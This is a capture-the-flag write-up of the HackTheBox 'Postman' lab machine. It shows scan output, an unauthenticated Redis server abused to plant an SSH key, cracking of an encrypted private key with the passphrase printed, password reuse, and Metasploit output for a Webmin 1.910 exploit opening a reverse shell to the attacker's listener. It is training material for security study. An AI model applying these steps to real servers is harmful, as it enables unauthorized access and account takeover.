HackTheBox Postman - Writeup
|Release Date:||2019/11/02 19:00|
~ User Part
Starting with a nmap-scan gives us the following results:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp open redis Redis key-value store
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
The machine provides two different http server, one on default port 80 and another on port 10000. At first sight, port 80 doesn't reveal any useful information. A gobuster scan just shows default directories like images, js and similar directories. The webserver on port 10000 forces us to use https. Doing so, a Webmin login page is shown, but we don't have any credentials yet. There is another interesting port: 6379/tcp: Redis key-value store. Using redis-cli we can try to connect to that server:
The redis server doesn't seem to be password protected! Doing some research, we find an exploit, which can exploit this fact by setting our ssh public key as a key-value pair and writing it into the changed database file: /var/lib/redis/.ssh/authorized_keys. More information can be found here: Redis RCE. For this settings, i had to try some default paths and look at the previously set values using config get *. Using this public key, we can now login as redis user with our private key. Doing some basic enumeration of common folder reveals the next step for the user part:
drwxr-xr-x 2 root root 4096 Sep 11 11:28 .
drwxr-xr-x 22 root root 4096 Aug 25 15:03 ..
-rwxr-xr-x 1 Matt Matt 1743 Aug 26 00:11 id_rsa.bak
We got a private key, probably for the user Matt found in /etc/passwd. Unfortunately, this key is encrypted but we can download it using scp and try to crack it using john:
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 1 candidate left, minimum 4 needed for performance.
1g 0:00:00:15 DONE (2020-02-07 21:20) 0.06583g/s 944153p/s 944153c/s 944153C/s *7¡Vamos!
After changing permissions to 600 (rw-), we can try to use this private key for ssh authentication as user Matt. Unfortunately, the server immediately closes the connection. Isn't the user allowed to connect via ssh? But we can try another thing: logging back in as user redis and executing su to switch to user Matt. And indeed! We got a credential reuse. We can now easily read the user flag:
# Root Part
Doing some basic enumeration and looking at the process table (ps aux | grep root), we notice, that the webmin app running on port 10000 we found before is running as root user. We will focus on exploiting it.
As user Matt reused his credentials for his private ssh key and his user login, we should try to use it on the Webmin login page, we found in the initial enumeration step. We can now see again, Matt seems to keep only one password in mind. On the start page, we can find the Webmin version: 1.910. Doing some research, we find a remote code execution. We can use this metasploit module easily:
[*] Started reverse TCP handler on 10.10.x.x:4444
[+] Session cookie: 56e6a17006481c0f7262e772cb3f7074
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.x.x:4444 -> 10.10.10.160:43266) at 2020-02-08 16:34:50 -0500
+ Additional Notes
TIL: Don't let your applications be publicly accessible without requiring authentications.
Also: Run processes with minimum-required permissions only and try to encapsulate it from other software and configuration files.